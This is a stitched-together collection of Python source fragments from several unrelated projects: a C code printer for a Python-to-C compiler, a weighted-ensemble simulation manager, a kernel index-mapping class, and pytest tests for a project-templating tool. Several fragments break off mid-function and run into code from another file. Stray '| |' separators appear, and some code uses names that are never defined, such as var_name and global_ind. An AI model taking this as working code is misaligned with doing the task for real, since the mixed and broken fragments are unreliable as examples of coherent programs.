args = [VariableAddress(a) if self.stored_in_c_pointer(a) else a for a in expr.expr]
if len(args) == 0:
return 'return;\n'
if len(args) > 1:
if expr.stmt:
return self._print(expr.stmt)+'\n'+'return 0;\n'
return 'return 0;\n'
if expr.stmt:
# get Assign nodes from the CodeBlock object expr.stmt.
last_assign = expr.stmt.get_attribute_nodes(Assign, excluded_nodes=FunctionCall)
deallocate_nodes = expr.stmt.get_attribute_nodes(Deallocate, excluded_nodes=(Assign,))
vars_in_deallocate_nodes = [i.variable for i in deallocate_nodes]
# Check the Assign objects list in case the user assigns a variable
# to an object containing an IndexedElement object.
if not last_assign:
return 'return {0};\n'.format(self._print(args[0]))
# make sure that stmt contains one assign node.
last_assign = last_assign[-1]
variables = last_assign.rhs.get_attribute_nodes(Variable, excluded_nodes=(FunctionDef,))
unneeded_var = not any(b in vars_in_deallocate_nodes for b in variables)
if unneeded_var:
code = ''.join(self._print(a) for a in expr.stmt.body if a is not last_assign)
return code + '\nreturn {};\n'.format(self._print(last_assign.rhs))
else:
code = ''+self._print(expr.stmt)
self._additional_declare.append(last_assign.lhs)
return code + 'return {0};\n'.format(self._print(args[0]))
def _print_Pass(self, expr):
return '// pass\n'
def _print_Nil(self, expr):
return 'NULL'
def _print_PyccelAdd(self, expr):
return ' + '.join(self._print(a) for a in expr.args)
def _print_PyccelMinus(self, expr):
args = [self._print(a) for a in expr.args]
if len(args) == 1:
return '-{}'.format(args[0])
return ' - '.join(args)
def _print_PyccelMul(self, expr):
return ' * '.join(self._print(a) for a in expr.args)
def _print_PyccelDiv(self, expr):
if all(a.dtype is NativeInteger() for a in expr.args):
args = [NumpyFloat(a) for a in expr.args]
else:
args = expr.args
return ' / '.join(self._print(a) for a in args)
def _print_PyccelFloorDiv(self, expr):
self._additional_imports.add("math")
# the result type of the floor division is dependent on the arguments
# type, if all arguments are integers the result is integer otherwise
# the result type is float
need_to_cast = all(a.dtype is NativeInteger() for a in expr.args)
code = ' / '.join(self._print(a if a.dtype is NativeReal() else NumpyFloat(a)) for a in expr.args)
if (need_to_cast):
cast_type = self.find_in_dtype_registry('int', expr.precision)
return "({})floor({})".format(cast_type, code)
return "floor({})".format(code)
def _print_PyccelRShift(self, expr):
return ' >> '.join(self._print(a) for a in expr.args)
def _print_PyccelLShift(self, expr):
return ' << '.join(self._print(a) for a in expr.args)
def _print_PyccelBitXor(self, expr):
if expr.dtype is NativeBool():
return '{0} != {1}'.format(self._print(expr.args[0]), self._print(expr.args[1]))
return ' ^ '.join(self._print(a) for a in expr.args)
def _print_PyccelBitOr(self, expr):
if expr.dtype is NativeBool():
return ' || '.join(self._print(a) for a in expr.args)
return ' | '.join(self._print(a) for a in expr.args)
def _print_PyccelBitAnd(self, expr):
if expr.dtype is NativeBool():
return ' && '.join(self._print(a) for a in expr.args)
return ' & '.join(self._print(a) for a in expr.args)
def _print_PyccelInvert(self, expr):
return '~{}'.format(self._print(expr.args[0]))
def _print_PyccelAssociativeParenthesis(self, expr):
return '({})'.format(self._print(expr.args[0]))
def _print_PyccelUnary(self, expr):
return '+{}'.format(self._print(expr.args[0]))
def _print_PyccelUnarySub(self, expr):
return '-{}'.format(self._print(expr.args[0]))
def _print_AugAssign(self, expr):
lhs_code = self._print(expr.lhs)
op = expr.op
rhs_code = self._print(expr.rhs)
return "{0} {1}= {2};\n".format(lhs_code, op, rhs_code)
def _print_Assign(self, expr):
prefix_code = ''
lhs = expr.lhs
rhs = expr.rhs
if isinstance(lhs, Variable) and lhs.is_optional:
if lhs in self._optional_partners:
# Collect temporary variable which provides
# allocated memory space for this optional variable
tmp_var = self._optional_partners[lhs]
else:
# Create temporary variable to provide allocated
# memory space before assigning to the pointer value
# (may be NULL)
tmp_var_name = self._parser.get_new_name()
tmp_var = lhs.clone(tmp_var_name, is_optional=False)
self._additional_declare.append(tmp_var)
self._optional_partners[lhs] = tmp_var
# Point optional variable at an allocated memory space
prefix_code = self._print(AliasAssign(lhs, tmp_var))
if isinstance(rhs, FunctionCall) and isinstance(rhs.dtype, NativeTuple):
self._temporary_args = [VariableAddress(a) for a in lhs]
return prefix_code+'{};\n'.format(self._print(rhs))
# Inhomogeneous tuples are unravelled and therefore do not exist in the C printer
if isinstance(rhs, (NumpyArray, PythonTuple)):
return prefix_code+self.copy_NumpyArray_Data(expr)
if isinstance(rhs, (NumpyFull)):
return prefix_code+self.arrayFill(expr)
if isinstance(rhs, NumpyArange):
return prefix_code+self.fill_NumpyArange(rhs, lhs)
lhs = self._print(expr.lhs)
rhs = self._print(expr.rhs)
return prefix_code+'{} = {};\n'.format(lhs, rhs)
def _print_AliasAssign(self, expr):
lhs_var = expr.lhs
rhs_var = expr.rhs
lhs = VariableAddress(lhs_var)
rhs = VariableAddress(rhs_var) if isinstance(rhs_var, Variable) else rhs_var
lhs = self._print(lhs)
rhs = self._print(rhs)
# the condition below handles reassigning a pointer to an array view:
# the pointer's is_view attribute is set to false so it can be ignored by the free_pointer function.
if isinstance(lhs_var, Variable) and lhs_var.is_ndarray \
and isinstance(rhs_var, Variable) and rhs_var.is_ndarray:
if lhs_var.order == rhs_var.order:
return 'alias_assign(&{}, {});\n'.format(lhs, rhs)
else:
return 'transpose_alias_assign(&{}, {});\n'.format(lhs, rhs)
return '{} = {};\n'.format(lhs, rhs)
def _print_For(self, expr):
indices = expr.iterable.loop_counters
index = indices[0] if indices else expr.target
if expr.iterable.num_loop_counters_required:
self._additional_declare.append(index)
target = index
iterable = expr.iterable.get_range()
if not isinstance(iterable, PythonRange):
# Only iterable currently supported is PythonRange
errors.report(PYCCEL_RESTRICTION_TODO, symbol=expr,
severity='fatal')
counter = self._print(target)
body = self._print(expr.body)
additional_assign = CodeBlock(expr.iterable.get_assigns(expr.target))
body = self._print(additional_assign) + body
start = self._print(iterable.start)
stop = self._print(iterable.stop )
step = self._print(iterable.step )
test_step = iterable.step
if isinstance(test_step, PyccelUnarySub):
test_step = iterable.step.args[0]
# testing if the step is a value or an expression
if isinstance(test_step, Literal):
op = '>' if isinstance(iterable.step, PyccelUnarySub) else '<'
return ('for ({counter} = {start}; {counter} {op} {stop}; {counter} += '
'{step})\n{{\n{body}}}\n').format(counter=counter, start=start, op=op,
stop=stop, step=step, body=body)
else:
return (
'for ({counter} = {start}; ({step} > 0) ? ({counter} < {stop}) : ({counter} > {stop}); {counter} += '
'{step})\n{{\n{body}}}\n').format(counter=counter, start=start,
stop=stop, step=step, body=body)
def _print_FunctionalFor(self, expr):
loops = ''.join(self._print(i) for i in expr.loops)
return loops
def _print_CodeBlock(self, expr):
if not expr.unravelled:
body_exprs, new_vars = expand_to_loops(expr, self._parser.get_new_variable, language_has_vectors = False)
self._additional_declare.extend(new_vars)
else:
body_exprs = expr.body
body_stmts = []
for b in body_exprs :
code = self._print(b)
code = self._additional_code + code
self._additional_code = ''
body_stmts.append(code)
return ''.join(self._print(b) for b in body_stmts)
def _print_Idx(self, expr):
return self._print(expr.label)
def _print_Exp1(self, expr):
return "M_E"
def _print_Pi(self, expr):
return 'M_PI'
def _print_Infinity(self, expr):
return 'HUGE_VAL'
def _print_NegativeInfinity(self, expr):
return '-HUGE_VAL'
def _print_PythonReal(self, expr):
return 'creal({})'.format(self._print(expr.internal_var))
def _print_PythonImag(self, expr):
return 'cimag({})'.format(self._print(expr.internal_var))
def _handle_is_operator(self, Op, expr):
lhs = self._print(expr.lhs)
rhs = self._print(expr.rhs)
a = expr.args[0]
b = expr.args[1]
if Nil() in expr.args:
lhs = VariableAddress(expr.lhs) if isinstance(expr.lhs, Variable) else expr.lhs
rhs = VariableAddress(expr.rhs) if isinstance(expr.rhs, Variable) else expr.rhs
lhs = self._print(lhs)
rhs = self._print(rhs)
return '{} {} {}'.format(lhs, Op, rhs)
if (a.dtype is NativeBool() and b.dtype is NativeBool()):
return '{} {} {}'.format(lhs, Op, rhs)
else:
errors.report(PYCCEL_RESTRICTION_IS_ISNOT,
symbol=expr, severity='fatal')
def _print_PyccelIsNot(self, expr):
return self._handle_is_operator("!=", expr)
def _print_PyccelIs(self, expr):
return self._handle_is_operator("==", expr)
def _print_Piecewise(self, expr):
if expr.args[-1].cond is not True:
# We need the last conditional to be a True, otherwise the resulting
# function may not return a result.
raise ValueError("All Piecewise expressions must contain an "
"(expr, True) statement to be used as a default "
"condition. Without one, the generated "
"expression may not evaluate to anything | |
"""Module for the main simulation management class.
All component class interfaces are set by how the manager interacts
with them.
Managers should implement a three phase protocol for running
simulations:
- init
- run_simulation
- cleanup
The separate `init` method is different from the constructor
`__init__` method and instead calls the special `init` method on all
wepy components (runner, resampler, boundary conditions, and
reporters) at runtime.
This allows for things that need to be done at runtime before a
simulation begins, e.g. opening files, that you don't want done at
construction time.
This is useful for orchestration because the complete simulation
'image' can be made before runtime (and pickled or otherwise
persisted) without producing external effects.
This is used primarily for reporters, which perform I/O, and work
mappers which may spawn processes.
The `cleanup` method should be called both when the simulation ends
normally and when it ends abnormally.
This allows file handles to be closed and processes to be killed at
the end of a simulation and upon failure.
The base method for running simulations is `run_cycle`, which runs
a cycle of weighted ensemble given the state of all the components.
The simulation manager should provide multiple ways of running
simulations depending on whether the number of cycles is known up
front or is to be determined adaptively (e.g. according to some time
limit).
"""
import numpy as np
import sys
import time
from copy import deepcopy
import logging
from wepy.work_mapper.mapper import Mapper
class Manager(object):
"""The class that coordinates wepy simulations.
The Manager class is the lynchpin of wepy simulations and is where
all the different components are composed.
Strictly speaking the Manager defines the interfaces each
component must provide to function.
Developers can call `run_cycle` directly but the following
convenience functions are provided to run many cycles in
succession as a single 'run' with consecutive cycle idxs:
- run_simulation_by_time
- run_simulation
The corresponding 'continue' run methods will simply pass a run
index to reporters indicating that the run continues a previous one.
For these run methods the `init` method is called followed by
iterative calls to `run_cycle` and finally with a call to
`cleanup`.
The order of application of wepy components are:
- runner
- boundary_conditions
- resampler
- reporters
"""
REPORT_ITEM_KEYS = ('cycle_idx', 'n_segment_steps',
'new_walkers', 'resampled_walkers',
'warp_data', 'bc_data', 'progress_data',
'resampling_data', 'resampler_data',
'worker_segment_times', 'cycle_runner_time',
'cycle_bc_time', 'cycle_resampling_time',)
"""Keys of values that will be passed to reporters.
This indicates the values that the reporters will have access to.
"""
def __init__(self, init_walkers,
runner = None,
work_mapper = None,
resampler = None,
boundary_conditions = None,
reporters = None):
"""Constructor for Manager.
Arguments
---------
init_walkers : list of walkers
The list of the initial walkers that will be run.
runner : object implementing the Runner interface
The runner to be used for propagating sampling segments of walkers.
work_mapper : object implementing the WorkMapper interface
The object that will be used to perform a set of runner
segments in a cycle.
resampler : object implementing the Resampler interface
The resampler to be used in the simulation
boundary_conditions : object implementing BoundaryCondition interface, optional
The boundary conditions to apply to walkers
reporters : list of objects implementing the Reporter interface, optional
Reporters to be used. You should provide these if you want to keep data.
Warnings
--------
While reporters are strictly optional, you probably want to
provide some because the simulation manager provides no
utilities for saving data from the simulations except for the
walkers at the end of a cycle or simulation.
See Also
--------
wepy.reporter.hdf5 : The standard reporter for molecular simulations in wepy.
wepy.orchestration.orchestrator.Orchestrator : for running simulations with
checkpointing, restarting, reporter localization, and configuration hotswapping
with command line interface.
"""
self.init_walkers = init_walkers
self.n_init_walkers = len(init_walkers)
# the runner is the object that runs dynamics
self.runner = runner
# the resampler
self.resampler = resampler
# object for boundary conditions
self.boundary_conditions = boundary_conditions
# the method for writing output
if reporters is None:
self.reporters = []
else:
self.reporters = reporters
if work_mapper is None:
self.work_mapper = Mapper()
else:
self.work_mapper = work_mapper
def run_segment(self, walkers, segment_length, cycle_idx):
"""Run a time segment for all walkers using the available workers.
Maps the work for running each segment for each walker using
the work mapper.
Walkers will have the same weights but different states.
Parameters
----------
walkers : list of walkers
    The walkers to propagate for this segment.
segment_length : int
    Number of steps to run in each segment.
cycle_idx : int
    Index of the current cycle, passed through to the runner.
Returns
-------
new_walkers : list of walkers
The walkers after the segment of sampling simulation.
"""
num_walkers = len(walkers)
logging.info("Starting segment")
try:
new_walkers = list(self.work_mapper.map(
# args, which must be supported by the map function
walkers,
(segment_length for i in range(num_walkers)),
# kwargs which are optionally recognized by the map function
cycle_idx=(cycle_idx for i in range(num_walkers)),
walker_idx=(walker_idx for walker_idx in range(num_walkers)),
)
)
except Exception as exception:
# get the errors from the work mapper error queue
self.cleanup()
# report on all of the errors that occurred
raise exception
logging.info("Ending segment")
return new_walkers
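The `work_mapper.map` call above fans each walker out together with per-walker kwargs. A minimal serial stand-in for the work mapper (hypothetical; it matches only the call shape used in `run_segment`, not the full wepy WorkMapper interface):

```python
class SerialMapper:
    """Serial stand-in for a wepy work mapper: zips positional iterables
    with per-item kwarg iterables and applies the segment function to
    each walker in turn."""

    def __init__(self, func):
        self._func = func

    def map(self, *iterables, **kwarg_iterables):
        keys = list(kwarg_iterables)
        results = []
        for packed in zip(*iterables, *(kwarg_iterables[k] for k in keys)):
            pos = packed[:len(iterables)]
            kw = dict(zip(keys, packed[len(iterables):]))
            results.append(self._func(*pos, **kw))
        return results

# usage: a trivial "segment" that just tags each walker with its indices
mapper = SerialMapper(lambda w, n, cycle_idx, walker_idx: (w, n, cycle_idx, walker_idx))
out = mapper.map(['w0', 'w1'], (10 for _ in range(2)),
                 cycle_idx=(0 for _ in range(2)),
                 walker_idx=(i for i in range(2)))
```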
def run_cycle(self, walkers, n_segment_steps, cycle_idx):
"""Run a full cycle of weighted ensemble simulation using each
component.
The order of application of wepy components are:
- runner
- boundary_conditions
- resampler
- reporters
The `init` method should have been called before this or
components may fail.
This method is not idempotent and will alter the state of wepy
components.
The cycle index is not kept as a state variable of the simulation
manager and so must be provided here. The motivation is that a cycle
index is really a property of a run; runs can be composed in many
ways, so cycle indexing is handled by the higher-level methods that
call run_cycle.
Each component should implement its respective interface to be
called in this method, the order and names of the methods
called are as follows:
1. runner.pre_cycle
2. run_segment -> work_mapper.map(runner.run_segment)
3. runner.post_cycle
4. boundary_conditions.warp_walkers (if present)
5. resampler.resample
6. reporter.report for all reporters
The pre- and post-cycle calls give the runner exactly one setup and
one teardown call per cycle.
The boundary_conditions component is optional, as are the
reporters (although it won't be very useful to run this
without any).
Parameters
----------
walkers : list of walkers
n_segment_steps : int
Number of steps to run in each segment.
cycle_idx : int
The index of this cycle.
Returns
-------
new_walkers : list of walkers
The resulting walkers of the cycle
sim_components : list
The runner, resampler, and boundary conditions
objects at the end of the cycle.
See Also
--------
run_simulation : To run a simulation by the number of cycles
run_simulation_by_time
"""
# delegated to _run_cycle so that all errors from a cycle can be
# caught in one place and cleanup performed if one occurs
return self._run_cycle(walkers, n_segment_steps, cycle_idx)
def _run_cycle(self, walkers, n_segment_steps, cycle_idx):
"""See run_cycle."""
logging.info("Begin cycle {}".format(cycle_idx))
# run the pre-cycle hook
self.runner.pre_cycle(walkers=walkers,
n_segment_steps=n_segment_steps,
cycle_idx=cycle_idx)
# run the segment
start = time.time()
logging.info("Entering run segment")
new_walkers = self.run_segment(walkers, n_segment_steps, cycle_idx)
end = time.time()
runner_time = end - start
logging.info("Starting post cycle")
# run post-cycle hook
self.runner.post_cycle()
logging.info("End cycle {}".format(cycle_idx))
# boundary conditions should be optional;
# initialize the warped walkers to the new_walkers and
# change them later if need be
warped_walkers = new_walkers
warp_data = []
bc_data = []
progress_data = {}
bc_time = 0.0
if self.boundary_conditions is not None:
# apply rules of boundary conditions and warp walkers through space
start = time.time()
logging.info("Starting boundary conditions")
bc_results = self.boundary_conditions.warp_walkers(new_walkers,
cycle_idx)
end = time.time()
bc_time = end - start
# warping results
warped_walkers = bc_results[0]
warp_data = bc_results[1]
bc_data = bc_results[2]
progress_data = bc_results[3]
if len(warp_data) > 0:
logging.info("Returned warp record in cycle {}".format(cycle_idx))
# resample walkers
start = time.time()
logging.info("Starting resampler")
resampling_results = self.resampler.resample(warped_walkers)
end = time.time()
resampling_time = end - start
resampled_walkers = resampling_results[0]
resampling_data = resampling_results[1]
resampler_data = resampling_results[2]
# log the weights of the walkers after resampling
result_template_str = "|".join(["{:^5}" for i in range(self.n_init_walkers + 1)])
walker_weight_str = result_template_str.format("weight",
*[round(walker.weight, 3) for walker in resampled_walkers])
for i, f in enumerate(found):
if f is not None:
parents[missing_inds[i]] = f
return parents
class domain_transform(object):
"""
Simple helper class to keep track of transform variables to test for
equality
"""
def __init__(self, mapping, affine):
self.mapping = mapping
self.affine = affine
def __eq__(self, other):
return self.mapping == other.mapping and self.affine == other.affine
class MapStore(object):
"""
This class manages maps and masks for inputs / outputs in kernels
Attributes
----------
loopy_opts : :class:`LoopyOptions`
The loopy options for kernel creation
map_domain : :class:`creator`
The domain of the iname to use for a mapped kernel
is_unit_test : bool
If true, we are generating arrays for a unit-test, and hence we should not
convert anything to working-buffer form
iname : str
The loop index to work with
have_input_map : bool
If true, the input map domain needs a map for expression
transformed_domains : set of :class:`tree_node`
The nodes that have required transforms
transform_insns : set
A set of transform instructions generated for this :class:`MapStore`
raise_on_final : bool
If true, raise an exception if a variable / domain is added to the
domain tree after this :class:`MapStore` has been finalized
working_buffer_index : bool
If True, use internal buffers for OpenCL/CUDA/etc. array creation
where possible. If False, use full sized arrays.
"""
def __init__(self, loopy_opts, map_domain, test_size, iname='i',
raise_on_final=True):
self.loopy_opts = loopy_opts
self.map_domain = map_domain
self._check_is_valid_domain(self.map_domain)
self.domain_to_nodes = {}
self.is_unit_test = isinstance(test_size, int)
self.transformed_domains = set()
self.tree = tree_node(self, self._get_base_domain(), iname=iname)
self.domain_to_nodes[self._get_base_domain()] = self.tree
from pytools import UniqueNameGenerator
self.taken_transform_names = UniqueNameGenerator(set([iname]))
self.iname = iname
self.have_input_map = False
self.raise_on_final = raise_on_final
self.is_finalized = False
self.working_buffer_index = None
self.reshape_to_working_buffer = False
# if we're using a pre-split, find the working-buffer index (WBI)
if self.loopy_opts.pre_split:
from pyjac.kernel_utils.kernel_gen import kernel_generator
specialization = kernel_generator.apply_specialization(
self.loopy_opts, var_name, None,
get_specialization=True)
global_index = next((k for k, v in six.iteritems(specialization)
if v == 'g.0'), global_ind)
self.working_buffer_index = global_index
# unit tests operate on the whole array
self.initial_condition_dimension = None
if not self.is_unit_test:
self.initial_condition_dimension = \
self.loopy_opts.initial_condition_dimsize
def _is_map(self):
"""
Return true if map kernel
"""
return True
@property
def transform_insns(self):
return set(val.insn for val in
self.transformed_domains if val.insn)
def _add_input_map(self):
"""
Adds an input map, and remakes the base domain
"""
# copy the base map domain
new_creator_name = self.map_domain.name + '_map'
new_map_domain = self.map_domain.copy()
# update new domain
new_map_domain.name = new_creator_name
new_map_domain.initializer = \
np.arange(self.map_domain.initializer.size, dtype=kint_type)
# change the base of the tree
new_base = tree_node(self, new_map_domain, iname=self.iname,
children=self.tree)
# and parent
# to maintain consistency/sanity, we always consider the original tree
# the 'base', even if the true base is being replaced
# This will be accounted for in :meth:`finalize`
self.tree.parent = new_base
# reset iname
self.tree.iname = None
# update domain
self.map_domain = new_map_domain
# and finally set tree
self.domain_to_nodes[new_map_domain] = new_base
# finally, check the tree's offspring. If they can be moved to the
# new base without mapping, do so
for child in list(self.tree.children):
if not child.is_leaf():
mapping, affine = self._get_map_transform(
new_map_domain, child.domain)
if not mapping:
# set parent
child.parent = new_base
# remove from old parent's child list
self.tree.children.remove(child)
# and add to new parent's child list
new_base.children.add(child)
self.have_input_map = True
@property
def absolute_root(self):
"""
Returns the :class:`MapStore`'s :attr:`tree`, if the store has no input map,
else the parent of the tree
A convenience method to get the true root of the tree
"""
return self.tree.parent if self.have_input_map else self.tree
def _create_transform(self, node, transform, affine=None):
"""
Creates a transform for the :class:`tree_node` node based on
its parent and any affine mapping supplied
Parameters
----------
node : :class:`tree_node`
The node to create a transform for
transform : :class:`domain_transform`
The domain transform to store the base iname in
affine : int or dict
An integer or dictionary offset
Returns
-------
new_iname : str
The iname created for this transform
transform_insn : str or None
The loopy transform instruction to use. If None, this is an
affine transformation that doesn't require a separate instruction
"""
assert node.parent is not None, (
'Cannot create a transform for node'
' {} without parent'.format(node.domain.name))
assert node.parent.iname, (
'Cannot create a transform starting from parent node'
' {}, as it has no assigned iname'.format(node.parent.domain.name))
# add the transformed inames, instruction and map
new_iname = self._get_transform_iname(self.iname)
# and use the parent's "iname" (i.e. with affine mapping)
# to generate the transform
transform_insn = self.generate_transform_instruction(
node.parent.iname, new_iname, map_arr=node.domain.name,
affine=affine
)
if affine:
# store this as the new iname instead of issuing a new instruction
new_iname = transform_insn
transform_insn = None
return new_iname, transform_insn
def _get_transform_iname(self, iname):
"""Returns a new iname"""
return self.taken_transform_names(iname)
def _get_mask_transform(self, domain, new_domain):
"""
Get the appropriate mask transform between two given domains.
Most likely, this will be a numpy array, but it may be an affine
mapping
Parameters
----------
domain : :class:`creator`
The domain to map
new_domain: :class:`creator`
The domain to map to
Returns
-------
None if domains are equivalent
Affine `str` map if an affine transform is possible
:class:`creator` if a more complex map is required
"""
try:
dcheck = domain.initializer
except AttributeError:
dcheck = domain
try:
ncheck = new_domain.initializer
except AttributeError:
ncheck = new_domain
# check equal
if np.array_equal(dcheck, ncheck):
return None, None
# check for affine
dset = np.where(dcheck != -1)[0]
nset = np.where(ncheck != -1)[0]
# must be same size for affine
if dset.size == nset.size:
# for an affine mask transform, the set positions must all be
# shifted by the same constant offset
diffs = nset - dset
affine = diffs[0]
if np.all(diffs == affine):
# additionally, the affine mapped values should match the
# original ones
if np.array_equal(ncheck[nset], dcheck[dset]):
return new_domain, affine
return new_domain, None
def _get_map_transform(self, domain, new_domain):
"""
Get the appropriate map transform between two given domains.
Most likely, this will be a numpy array, but it may be an affine
mapping
Parameters
----------
domain : :class:`creator`
The domain to map
new_domain: :class:`creator`
The domain to map to
Returns
-------
new_domain : :class:`creator`
If not None, this is the mapping that must be used
- None if domains are equivalent
- `str` map if an affine transform is possible
- :class:`creator` if a more complex map is required
"""
try:
dcheck = domain.initializer
except AttributeError:
dcheck = domain
try:
ncheck = new_domain.initializer
except AttributeError:
ncheck = new_domain
# first, make sure the domains are the same size; the comparison is
# nonsensical otherwise
if dcheck.shape != ncheck.shape:
# Can't use affine map on domains of differing sizes
return new_domain, None
# check equal
if np.array_equal(dcheck, ncheck):
return None, None
# check for affine map
if np.all(ncheck - dcheck == (ncheck - dcheck)[0]):
return new_domain, (ncheck - dcheck)[0]
# finally return map
return new_domain, None
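The affine-map detection in `_get_map_transform` reduces to a constant-difference check. A minimal standalone sketch, using plain Python lists in place of numpy-backed `creator` domains (the names here are illustrative, not pyjac API):

```python
def map_transform(domain, new_domain):
    """Classify the transform between two index domains.

    Returns (needs_map, affine_offset):
      (False, None) -- domains identical, no transform needed
      (True, k)     -- new_domain is domain shifted by the constant k
      (True, None)  -- a full lookup-array map is required
    """
    if len(domain) != len(new_domain):
        return True, None                 # differing sizes can never be affine
    if domain == new_domain:
        return False, None
    diffs = [n - d for d, n in zip(domain, new_domain)]
    if all(d == diffs[0] for d in diffs):
        return True, diffs[0]             # constant offset: affine transform
    return True, None
```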
def _get_transform(self, base, domain):
return self._get_map_transform(base, domain) if self._is_map()\
else self._get_mask_transform(base, domain)
def _check_is_valid_domain(self, domain):
"""Makes sure the domain passed is a valid :class:`creator`"""
assert domain is not None, 'Invalid domain'
assert isinstance(domain, creator), ('Domain'
' must be of type `creator`')
assert domain.name is not None, ('Domain must have initialized name')
assert domain.initializer is not None, (
'Cannot use non-initialized creator {} as domain!'.format(
domain.name))
def _is_contiguous(self, domain):
"""Returns true if domain can be expressed with a simple for loop"""
indices = domain.initializer
return indices[0] + indices.size - 1 == indices[-1]
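The contiguity test above is just "first + count - 1 == last", which, for a sorted index list, holds only for a dense run with no gaps:

```python
def is_contiguous(indices):
    """True if a sorted index list is a dense run, i.e. the loop over it
    can be written as a plain for loop from indices[0] to indices[-1]."""
    return indices[0] + len(indices) - 1 == indices[-1]

print(is_contiguous([3, 4, 5, 6]))  # True: dense run starting at 3
print(is_contiguous([3, 4, 6, 7]))  # False: gap at 5
```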
def _check_create_transform(self, node):
"""
Checks and creates a transform between the node and the
parent node if necessary
Parameters
----------
node : :class:`tree_node`
The domain to check
Returns
-------
new_iname : str
The iname created for this transform
transform_insn : str or None
The loopy transform instruction to use. If None, this is an
affine transformation that doesn't require a separate instruction
transform : :class:`domain_transform`
The representation of the transform used, for equality testing
"""
domain = node.domain
# check to see if root
if node.parent is None:
return None, None, None
base = node.parent.domain
# if this node should be treated as | |
import json
import os
from dataclasses import dataclass
from unittest.mock import patch
import appdirs
import pytest
from git import Head
from flexlate import branch_update
from flexlate.add_mode import AddMode
from flexlate.config import FlexlateConfig, FlexlateProjectConfig
from flexlate.constants import DEFAULT_MERGED_BRANCH_NAME, DEFAULT_TEMPLATE_BRANCH_NAME
from flexlate.exc import TemplateSourceWithNameAlreadyExistsException
from flexlate.ext_git import repo_has_merge_conflicts
from flexlate.template.base import Template
from flexlate.template.copier import CopierTemplate
from flexlate.template.types import TemplateType
from flexlate.transactions.transaction import FlexlateTransaction
from tests.config import GENERATED_FILES_DIR
from tests.fileutils import cookiecutter_one_generated_text_content
from tests.fixtures.git import *
from tests.fixtures.subdir_style import SubdirStyle, subdir_style
from tests.fixtures.template import *
from tests.fixtures.templated_repo import *
from tests.fixtures.add_mode import add_mode
from tests.fixtures.transaction import *
from tests.fs_checks import (
assert_template_source_cookiecutter_one_added_correctly,
assert_cookiecutter_one_applied_template_added_correctly,
)
from tests.gitutils import (
accept_theirs_in_merge_conflict,
assert_main_commit_message_matches,
)
def test_add_template_source_to_repo(
repo_with_placeholder_committed: Repo,
cookiecutter_one_template: CookiecutterTemplate,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_placeholder_committed
adder = Adder()
adder.add_template_source(
repo,
cookiecutter_one_template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
target_version="some version",
)
assert_template_source_cookiecutter_one_added_correctly(
cookiecutter_one_template, target_version="some version"
)
def test_add_template_source_with_existing_name_fails(
repo_with_cookiecutter_one_template_source: Repo,
copier_one_template: CopierTemplate,
add_source_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_one_template_source
adder = Adder()
with pytest.raises(TemplateSourceWithNameAlreadyExistsException):
adder.add_template_source(
repo,
copier_one_template,
add_source_transaction,
out_root=GENERATED_REPO_DIR,
)
@patch.object(appdirs, "user_config_dir", lambda name: GENERATED_FILES_DIR)
def test_add_local_cookiecutter_applied_template_to_repo(
add_mode: AddMode,
repo_with_cookiecutter_one_template_source: Repo,
cookiecutter_one_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_cookiecutter_one_template_source
template = cookiecutter_one_template
adder = Adder()
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=GENERATED_REPO_DIR,
add_mode=add_mode,
no_input=True,
)
if add_mode == AddMode.USER:
config_dir = GENERATED_FILES_DIR
template_root = GENERATED_REPO_DIR.absolute()
elif add_mode == AddMode.PROJECT:
config_dir = GENERATED_REPO_DIR
template_root = Path(".")
elif add_mode == AddMode.LOCAL:
# Template has output in a subdir, so with
# local mode config will also be in the subdir
config_dir = GENERATED_REPO_DIR / "b"
template_root = Path("..")
else:
raise ValueError(f"unsupported add mode {add_mode}")
assert_cookiecutter_one_applied_template_added_correctly(
template, config_dir, template_root, add_mode
)
@patch.object(appdirs, "user_config_dir", lambda name: GENERATED_FILES_DIR)
def test_add_local_copier_output_subdir_applied_template_to_repo(
add_mode: AddMode,
repo_with_copier_output_subdir_template_source: Repo,
copier_output_subdir_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_copier_output_subdir_template_source
template = copier_output_subdir_template
adder = Adder()
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=GENERATED_REPO_DIR,
add_mode=add_mode,
no_input=True,
)
if add_mode == AddMode.USER:
config_dir = GENERATED_FILES_DIR
template_root = GENERATED_REPO_DIR.absolute()
elif add_mode == AddMode.PROJECT:
config_dir = GENERATED_REPO_DIR
template_root = Path(".")
elif add_mode == AddMode.LOCAL:
# Even though template has output in a subdir, with copier
# it all still renders at root in output
config_dir = GENERATED_REPO_DIR
template_root = Path(".")
else:
raise ValueError(f"unsupported add mode {add_mode}")
config_path = config_dir / "flexlate.json"
config = FlexlateConfig.load(config_path)
assert len(config.applied_templates) == 1
at = config.applied_templates[0]
assert at.name == template.name
assert at.version == template.version
assert at.data == {"qone": "aone", "qtwo": "atwo"}
assert at.root == template_root
assert at.add_mode == add_mode
@patch.object(appdirs, "user_config_dir", lambda name: GENERATED_FILES_DIR)
def test_add_remote_cookiecutter_applied_template_to_repo(
add_mode: AddMode,
repo_with_remote_cookiecutter_template_source: Repo,
cookiecutter_remote_template: CookiecutterTemplate,
add_output_transaction: FlexlateTransaction,
):
repo = repo_with_remote_cookiecutter_template_source
template = cookiecutter_remote_template
adder = Adder()
adder.apply_template_and_add(
repo,
template,
add_output_transaction,
out_root=GENERATED_REPO_DIR,
add_mode=add_mode,
no_input=True,
)
if add_mode == AddMode.USER:
config_dir = GENERATED_FILES_DIR
template_root = GENERATED_REPO_DIR.absolute()
elif add_mode == AddMode.PROJECT:
config_dir = GENERATED_REPO_DIR
template_root = Path(".")
elif add_mode == AddMode.LOCAL:
config_dir = GENERATED_REPO_DIR / "abc"
template_root = Path("..")
else:
raise ValueError(f"unsupported add mode {add_mode}")
_assert_remote_cookiecutter_applied_correctly(
template, template_root, add_mode, config_dir=config_dir
)
template_sources_config_path = GENERATED_REPO_DIR / "flexlate.json"
ts_config = FlexlateConfig.load(template_sources_config_path)
assert len(ts_config.template_sources) == 1
source = ts_config.template_sources[0]
assert source.name == cookiecutter_remote_template.name
assert source.path == cookiecutter_remote_template.git_url
assert source.version == cookiecutter_remote_template.version
assert source.type == TemplateType.COOKIECUTTER
